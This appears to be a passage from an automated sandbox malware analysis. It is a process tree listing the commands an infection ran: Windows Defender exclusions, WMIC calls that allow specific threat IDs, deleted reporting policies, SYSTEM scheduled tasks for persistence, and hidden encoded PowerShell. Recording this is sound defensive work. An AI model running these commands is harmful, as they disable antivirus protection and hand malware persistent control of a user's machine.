\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mlmrxyCihFugMjhe\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mlmrxyCihFugMjhe\" /t REG_DWORD /d 0 /reg:64;"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DOWaNXZtDJLiC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DOWaNXZtDJLiC" /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DOWaNXZtDJLiC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EHjpVGHxoTMU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EHjpVGHxoTMU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RQzLvVUNU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RQzLvVUNU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVgZiWyyyxUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVgZiWyyyxUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NKsRZGTfNWtvCUVB /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NKsRZGTfNWtvCUVB /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mlmrxyCihFugMjhe /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mlmrxyCihFugMjhe /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gOEBzNFqG" /SC once /ST 08:09:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gOEBzNFqG"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gOEBzNFqG"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YqJChhYnTMHzkMjCc" /SC once /ST 10:07:00 /RU "SYSTEM" /TR "\"C:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\wlWQjVl.exe\" lA /site_id 394347 /S" /V1 /F3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "YqJChhYnTMHzkMjCc"3⤵
- Loads dropped DLL
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Suspicious use of SetThreadContext
- Drops file in Windows directory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
- Drops file in Drivers directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\wlWQjVl.exeC:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\wlWQjVl.exe lA /site_id 394347 /S2⤵
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bvmcjEjDUxHOOxIZsK"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RQzLvVUNU\xXFZxo.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "RulYNORIEfYpYdh" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RulYNORIEfYpYdh2" /F /xml "C:\Program Files (x86)\RQzLvVUNU\fsTGkSR.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "RulYNORIEfYpYdh"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RulYNORIEfYpYdh"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "sQKEyxOvETjkhD" /F /xml "C:\Program Files (x86)\EHjpVGHxoTMU2\mArXnrL.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LUNOxqyZdvVpf2" /F /xml "C:\ProgramData\NKsRZGTfNWtvCUVB\xFuJane.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cXKEjEvxPbALHdiUE2" /F /xml "C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\UgHqZCI.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "eoTgVxzVyVjpEcHcuxi2" /F /xml "C:\Program Files (x86)\DOWaNXZtDJLiC\BqGydzu.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TzpzstmaipgnuWYOU" /SC once /ST 07:04:55 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\mlmrxyCihFugMjhe\aarDutYy\nuClucy.dll\",#1 /site_id 394347" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "TzpzstmaipgnuWYOU"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuyRjeONjKr" /SC once /ST 12:03:04 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\ZGBIKrMi\SHDTkZw.exe\" vm /S"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuyRjeONjKr"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "spuyRjeONjKr"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "spuyRjeONjKr"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YqJChhYnTMHzkMjCc"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\mlmrxyCihFugMjhe\aarDutYy\nuClucy.dll",#1 /site_id 3943472⤵
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\mlmrxyCihFugMjhe\aarDutYy\nuClucy.dll",#1 /site_id 3943473⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "TzpzstmaipgnuWYOU"4⤵
-
C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\ZGBIKrMi\SHDTkZw.exeC:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\ZGBIKrMi\SHDTkZw.exe vm /S2⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Users\Admin\AppData\Roaming\haesdjvC:\Users\Admin\AppData\Roaming\haesdjv2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\haesdjvC:\Users\Admin\AppData\Roaming\haesdjv3⤵
-
C:\Users\Admin\AppData\Roaming\chesdjvC:\Users\Admin\AppData\Roaming\chesdjv2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\959e4e90-29c1-416c-9d68-7bedaaa37c27\4405.exeC:\Users\Admin\AppData\Local\959e4e90-29c1-416c-9d68-7bedaaa37c27\4405.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\959e4e90-29c1-416c-9d68-7bedaaa37c27\4405.exeC:\Users\Admin\AppData\Local\959e4e90-29c1-416c-9d68-7bedaaa37c27\4405.exe --Task3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
